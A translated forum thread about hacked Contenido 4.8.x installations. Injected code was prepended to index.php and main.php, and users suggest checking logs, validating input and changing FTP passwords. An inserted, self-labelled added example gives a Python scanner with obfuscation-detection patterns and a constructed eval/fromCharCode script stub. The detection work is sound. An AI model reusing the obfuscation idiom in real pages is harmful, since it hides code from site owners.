Contenido 4.8.xx attack - hacked
- Posts: 251
- Registered: Thu 10 Mar 2011, 17:02
- Location: Erlangen
Contenido 4.8.xx attack - hacked
Hello,
today several accounts of my Contenido installations at 1und1 were hacked. Versions 4.8.xx.
I don't know whether this has happened elsewhere too.
In the contenido directory the two files mail.php and index.php were overwritten (despite write protection).
Simply restore the two files and it works again.
Regards, sarronsarron
- Posts: 251
- Registered: Thu 10 Mar 2011, 17:02
- Location: Erlangen
Re: Contenido 4.8.xx attack - hacked
Apparently 4.8.14 and 4.8.15 were hacked.
At 1und1 and at Strato.
Regards, sarronsarron
Re: Contenido 4.8.xx attack - hacked
Could you please send me by PM the Apache logs for the period in which the hack mainly took place?
And of course also the CONTENIDO version, as well as details about PHP, Apache and the operating system?
Thanks and regards
xmurrix
CONTENIDO Downloads: CONTENIDO 4.10.1
CONTENIDO Links: Documentation portal, FAQ, API documentation
CONTENIDO @ Github: CONTENIDO 4.10 - with a development branch (develop-branch) that has received many improvements/optimisations and has been tuned for stability and compatibility with PHP 8.0 to 8.2.
- Posts: 3626
- Registered: Tue 12 Oct 2004, 20:00
- Location: Voerde (Niederrhein)
Re: Contenido 4.8.xx attack - hacked
Right, I have moved this; it should fit better here.
- Posts: 472
- Registered: Tue 15 Apr 2008, 15:57
- Location: Michelstadt
Re: Contenido 4.8.xx attack - hacked
I would like to have this information by PM as well. Many thanks!
Re: Contenido 4.8.xx attack - hacked
Thanks again for sending the logs by PM; so far it does not appear to be a CONTENIDO problem.
Please also check other scripts, if you have any, and the PHP version in use.
Ideally, the version of the applications in use (PHP, Apache, etc.) should not be made public either, since the version number very easily gives away the vulnerabilities. In Apache and PHP the sending of these details can be suppressed.
Regards
xmurrix
- Posts: 251
- Registered: Thu 10 Mar 2011, 17:02
- Location: Erlangen
Re: Contenido 4.8.xx attack - hacked
For me, all Contenido versions are affected.
In contenido/main.php and index.php the following code was copied to the beginning of the file.
Regards, sarronsarron
- Posts: 251
- Registered: Thu 10 Mar 2011, 17:02
- Location: Erlangen
Re: Contenido 4.8.xx attack - hacked
Hello xmurrix,
damn, you're right, other files are affected as well.
It looks like all index.php files from CMS and Contenido are affected.
CMS and Contenido still run, though.
Regards, sarronsarron
Re: Contenido 4.8.xx attack - hacked
sarronsarron wrote: ...In contenido/main.php and index.php the following code was copied to the beginning of the file...
Please search the Apache log for entries that might contain this code.
Also check form modules that accept input via POST and/or send e-mails. If incoming data is not validated, it alone could cause problems. But if contenido/main.php and contenido/index.php were modified, that probably did not happen through the website. PHP is started under the web server's account, everything PHP does runs under the web server's account, and that account normally has no rights to modify these PHP scripts.
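As an added example (not code from this thread or from CONTENIDO), a small Python scanner that turns the advice above into a check for the files sarronsarron describes: it flags index.php/main.php files that have content, a script tag, or the eval/fromCharCode/parseInt idiom in front of the first `<?php`, and compares each file against a previously recorded sha256 baseline. The sample install, its two files and the baseline are constructed inline; the baseline format (relative path to hex digest) is this example's own assumption.

```python
import hashlib
import os
import re
import tempfile

# Markers from the payload pasted in the thread: a character-code array decoded
# with String.fromCharCode / parseInt and handed to eval.
OBFUSCATION_RE = re.compile(rb'eval\s*\(|fromCharCode|"fro"\s*\+|parseInt\s*\(', re.I)


def inspect_php_source(data):
    """Findings for one script's bytes; an empty list means it looks clean."""
    findings = []
    # Everything in front of the first <?php (the whole file if there is none).
    head = data.partition(b"<?php")[0]
    # An entry script should begin with <?php; anything other than whitespace
    # or a UTF-8 BOM before it deserves a look.
    if head.strip(b" \t\r\n\xef\xbb\xbf"):
        findings.append("content-before-php-tag")
    if b"<script" in head.lower():
        findings.append("script-tag-before-php-tag")
    if OBFUSCATION_RE.search(head):
        findings.append("obfuscated-js-markers")
    return findings


def scan_tree(root, baseline=None, names=("index.php", "main.php")):
    """Walk root; return {relative path: findings}. baseline (assumed format)
    maps relative path -> sha256 hex recorded earlier from a known-good copy."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name not in names:
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                data = fh.read()
            findings = inspect_php_source(data)
            if baseline and rel in baseline and \
                    baseline[rel] != hashlib.sha256(data).hexdigest():
                findings.append("hash-mismatch")
            if findings:
                report[rel] = findings
    return report


def demo():
    """Constructed install: clean cms/index.php, tampered contenido/index.php."""
    clean = b"<?php\nrequire 'cfg.php';\n"
    tampered = (b'<script>n=["41","3o"];s=String["fro"+"mC"+"harCode"]'
                b'(parseInt(n[0],26));eval(s)</script><?php\nrequire "main.php";\n')
    with tempfile.TemporaryDirectory() as root:
        for sub, body in (("cms", clean), ("contenido", tampered)):
            os.makedirs(os.path.join(root, sub))
            with open(os.path.join(root, sub, "index.php"), "wb") as fh:
                fh.write(body)
        good = hashlib.sha256(clean).hexdigest()  # baseline taken from the good copy
        return scan_tree(root, {"cms/index.php": good, "contenido/index.php": good})
```

Run on a real install, `scan_tree("/path/to/docroot", baseline)` lists only the files worth opening by hand; an empty report does not prove the install is clean, only that these particular patterns are absent.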
- Posts: 251
- Registered: Thu 10 Mar 2011, 17:02
- Location: Erlangen
Re: Contenido 4.8.xx attack - hacked
Hi,
I did not find the entry in the log file from 24.1.13.
POST variables work.
Regards, sarronsarron
Re: Contenido 4.8.xx attack - hacked
sarronsarron wrote: ...I did not find the entry in the log file from 24.1.13...
OK, were the scripts also modified on 24.01.13?
If so, look for POST requests in the log file and check the modules of the pages the POST request went to.
sarronsarron wrote: ...POST variables work...
Do you mean that they arrive? If so, that is not what I meant; I meant checking these values for their content, i.e. that an e-mail address really is an e-mail address and that text contains only text and no code that could somehow be executed in the end.
Please don't misunderstand me, I am trying to approach the topic from different angles; the hole could be anywhere: CONTENIDO, modules, operating system, PHP, Apache, etc.
Re: Contenido 4.8.xx attack - hacked
With a problem like this, I would first change all FTP passwords and run a thorough virus and trojan scan on my own PC (and on all PCs where these FTP accounts are used), because FTP credentials are often harvested via a trojan and then used for modifications like these.
Traces of such FTP changes are often sought in vain, but after changing the passwords the trouble is usually over.
Regards
René
Re: Contenido 4.8.xx attack - hacked
Is there any news on this matter?
The hint about the FTP passwords is important too; in the FTP logs you can see whether there was an access to the server (other than your own) or not...
- Posts: 251
- Registered: Thu 10 Mar 2011, 17:02
- Location: Erlangen
Re: Contenido 4.8.xx attack - hacked
Hi,
I haven't done anything with the log files yet; today I had to make sure that I get all projects back to a reasonable state and change all FTP passwords.
I'll take care of it tomorrow.
Regards, sarronsarron
Re: Contenido 4.8.xx attack - hacked
Good luck with that!